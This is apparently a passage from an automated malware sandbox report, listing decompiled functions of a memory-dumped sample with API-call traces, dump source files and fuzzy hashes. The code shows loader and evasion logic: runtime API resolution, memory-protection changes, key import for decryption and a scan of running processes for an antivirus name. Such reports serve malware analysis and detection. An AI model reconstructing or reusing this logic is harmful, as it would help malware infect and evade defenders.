                                                                                                                                                                                                                                                                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4);
                                                                                                                                                                                                                                                                                    				_t18 = E6E051AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					_t29 = 8;
                                                                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t40 = _v8;
                                                                                                                                                                                                                                                                                    					_t29 = E6E0514DE(_t33, _t40, _t41);
                                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                                                                    						_t24 = E6E051F31(_t40, _t44); // executed
                                                                                                                                                                                                                                                                                    						_t29 = _t24;
                                                                                                                                                                                                                                                                                    						if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    							_t26 = E6E051030(_t44, _t40); // executed
                                                                                                                                                                                                                                                                                    							_t29 = _t26;
                                                                                                                                                                                                                                                                                    							if(_t29 == 0) {
                                                                                                                                                                                                                                                                                    								_push(_t26);
                                                                                                                                                                                                                                                                                    								_push(1);
                                                                                                                                                                                                                                                                                    								_push(_t40);
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                                                                    									_t29 = GetLastError();
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t42 = _v12;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                                                                    					E6E05136A(_t42);
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,6E051280,?,?,?,?,?,6E051280,?,?,?,?,?,?,00000002), ref: 6E05150B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E05153E
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051030: GetLastError.KERNEL32 ref: 6E0510E4
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 6E0512B4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC30AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                                                                    				signed short _t18;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                                                                    				signed short _t27;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_t18 = E00FC4BFF(_a4, _a8, _a12, __esi); // executed
                                                                                                                                                                                                                                                                                    					_t27 = _t18;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t27 = E00FC5419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                                                                                                    						_t26 = _a8 >> 1;
                                                                                                                                                                                                                                                                                    						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    							_t27 = 2;
                                                                                                                                                                                                                                                                                    							HeapFree( *0xfca290, 0, _a12);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t24 = _a12;
                                                                                                                                                                                                                                                                                    							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                                                                                                                                                                                                                    							 *__esi = _t24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t27;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43,80000002), ref: 00FC545B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43), ref: 00FC5480
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5419: RegCloseKey.ADVAPI32(80000002,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43,80000002,00000000,?), ref: 00FC54B0
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00FC4A79,?,004F0053,038F9338,00000000,?), ref: 00FC30F8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: QueryValue$CloseFreeHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2109406458-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 14a782079fca729958bca54fe06ff6c663d586dee29ef171c85f056f0c0dde4a
                                                                                                                                                                                                                                                                                    • Instruction ID: a5ddef66d72cb57f9c0081b8988e94f1b948febf2a8b27ed8c6ce4b80da1bb75
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14a782079fca729958bca54fe06ff6c663d586dee29ef171c85f056f0c0dde4a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19011D3224024AFFCF129F54CD47FAA7B66FB947A0F18C42DFA198A161D671D920EB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                    			E00FC1AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t11 =  &_a4;
                                                                                                                                                                                                                                                                                    				_t21 = 0;
                                                                                                                                                                                                                                                                                    				__imp__( &_a8);
                                                                                                                                                                                                                                                                                    				_t13 = E00FC35A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                                                                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                                                                                                    					_t21 = E00FC5C4E(_a8 + _a8);
                                                                                                                                                                                                                                                                                    					if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    						E00FC4502(_a4, _t21, _t23);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00FC2A03(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC1B02
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC35A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FC1B16,00000001,00FC6301,00000000), ref: 00FC35D9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC35A1: memcpy.NTDLL(00FC1B16,00FC6301,00000010,?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000), ref: 00FC35F2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC35A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FC361B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC35A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FC3633
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC35A1: memcpy.NTDLL(00000000,00000000,038F9630,00000010), ref: 00FC3685
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 894908221-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3ac217867511c38519daa93edfc20eaa0b62e784586314b26f9ebbf67c0ccf14
                                                                                                                                                                                                                                                                                    • Instruction ID: af22a810389ddac2947c69431a97c3727306d55b25ffa90f837e39bf31762483
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ac217867511c38519daa93edfc20eaa0b62e784586314b26f9ebbf67c0ccf14
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0543610010A7BCF116F65DD02EEB3B6DEF853A0B008015FD19CA111DA35DA55ABA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                    			E00FC5872(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00FC58BA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E00FC19E7() {
                                                                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                                                                                                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                                                                                                    					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                                                                    					while(_t8 != 0) {
                                                                                                                                                                                                                                                                                    						_t9 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    						_t2 = _t9 + 0xfcbe04; // 0x73617661
                                                                                                                                                                                                                                                                                    						_push( &_v264);
                                                                                                                                                                                                                                                                                    						if( *0xfca11c() != 0) {
                                                                                                                                                                                                                                                                                    							_t15 = 1;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t17);
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                                                                    				return _t15;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC19F7
                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 00FC1A0A
                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 00FC1A36
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FC1A45
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5084e03cca7ec594d7f6c2695649f3b0dc55ae85081975353cc4bb45976d537e
                                                                                                                                                                                                                                                                                    • Instruction ID: 388916fd26ba96136562b5677e1fdddcfafaf568bfbf87bed7828ce29b1c7eb9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5084e03cca7ec594d7f6c2695649f3b0dc55ae85081975353cc4bb45976d537e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F0BB369451295AD720A7369F4BFEB76BCFBC6314F000059F506D3001E738D965B6B1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E05146C() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t8 =  *0x6e0541b0;
                                                                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *0x6e0541bc = _t1;
                                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                                                                    				if(_t3 <= 5) {
                                                                                                                                                                                                                                                                                    					_t4 = 0x32;
                                                                                                                                                                                                                                                                                    					return _t4;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *0x6e0541ac = _t3;
                                                                                                                                                                                                                                                                                    					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                    					 *0x6e0541a8 = _t5;
                                                                                                                                                                                                                                                                                    					 *0x6e0541b0 = _t8;
                                                                                                                                                                                                                                                                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                                                    					 *0x6e0541a4 = _t6;
                                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                                    						 *0x6e0541a4 =  *0x6e0541a4 | 0xffffffff;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 6E05148A
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6E051499
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
                                                                                                                                                                                                                                                                                    • Instruction ID: 531187bab72e9b062dfb684982b792fcbe5083937ac4a7727a072defc4854279
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F09A30646B10BFEF808FB9AF197823BE0F70AB11F00101AF106C92C4D3B044628F88
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00FC6609(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                                                    				void _v76;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t226;
                                                                                                                                                                                                                                                                                    				signed int _t229;
                                                                                                                                                                                                                                                                                    				signed int _t231;
                                                                                                                                                                                                                                                                                    				signed int _t233;
                                                                                                                                                                                                                                                                                    				signed int _t235;
                                                                                                                                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                                                                                                                                    				signed int _t239;
                                                                                                                                                                                                                                                                                    				signed int _t241;
                                                                                                                                                                                                                                                                                    				signed int _t243;
                                                                                                                                                                                                                                                                                    				signed int _t245;
                                                                                                                                                                                                                                                                                    				signed int _t247;
                                                                                                                                                                                                                                                                                    				signed int _t249;
                                                                                                                                                                                                                                                                                    				signed int _t251;
                                                                                                                                                                                                                                                                                    				signed int _t253;
                                                                                                                                                                                                                                                                                    				signed int _t255;
                                                                                                                                                                                                                                                                                    				signed int _t257;
                                                                                                                                                                                                                                                                                    				signed int _t259;
                                                                                                                                                                                                                                                                                    				signed int _t274;
                                                                                                                                                                                                                                                                                    				signed int _t337;
                                                                                                                                                                                                                                                                                    				void* _t347;
                                                                                                                                                                                                                                                                                    				signed int _t348;
                                                                                                                                                                                                                                                                                    				signed int _t350;
                                                                                                                                                                                                                                                                                    				signed int _t352;
                                                                                                                                                                                                                                                                                    				signed int _t354;
                                                                                                                                                                                                                                                                                    				signed int _t356;
                                                                                                                                                                                                                                                                                    				signed int _t358;
                                                                                                                                                                                                                                                                                    				signed int _t360;
                                                                                                                                                                                                                                                                                    				signed int _t362;
                                                                                                                                                                                                                                                                                    				signed int _t364;
                                                                                                                                                                                                                                                                                    				signed int _t366;
                                                                                                                                                                                                                                                                                    				signed int _t375;
                                                                                                                                                                                                                                                                                    				signed int _t377;
                                                                                                                                                                                                                                                                                    				signed int _t379;
                                                                                                                                                                                                                                                                                    				signed int _t381;
                                                                                                                                                                                                                                                                                    				signed int _t383;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t399;
                                                                                                                                                                                                                                                                                    				signed int _t407;
                                                                                                                                                                                                                                                                                    				signed int _t409;
                                                                                                                                                                                                                                                                                    				signed int _t411;
                                                                                                                                                                                                                                                                                    				signed int _t413;
                                                                                                                                                                                                                                                                                    				signed int _t415;
                                                                                                                                                                                                                                                                                    				signed int _t417;
                                                                                                                                                                                                                                                                                    				signed int _t419;
                                                                                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                                                                                    				signed int _t423;
                                                                                                                                                                                                                                                                                    				signed int _t425;
                                                                                                                                                                                                                                                                                    				signed int _t427;
                                                                                                                                                                                                                                                                                    				signed int _t429;
                                                                                                                                                                                                                                                                                    				signed int _t437;
                                                                                                                                                                                                                                                                                    				signed int _t439;
                                                                                                                                                                                                                                                                                    				signed int _t441;
                                                                                                                                                                                                                                                                                    				signed int _t443;
                                                                                                                                                                                                                                                                                    				signed int _t445;
                                                                                                                                                                                                                                                                                    				void* _t447;
                                                                                                                                                                                                                                                                                    				signed int _t507;
                                                                                                                                                                                                                                                                                    				signed int _t598;
                                                                                                                                                                                                                                                                                    				signed int _t606;
                                                                                                                                                                                                                                                                                    				signed int _t612;
                                                                                                                                                                                                                                                                                    				signed int _t678;
                                                                                                                                                                                                                                                                                    				signed int* _t681;
                                                                                                                                                                                                                                                                                    				signed int _t682;
                                                                                                                                                                                                                                                                                    				signed int _t684;
                                                                                                                                                                                                                                                                                    				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
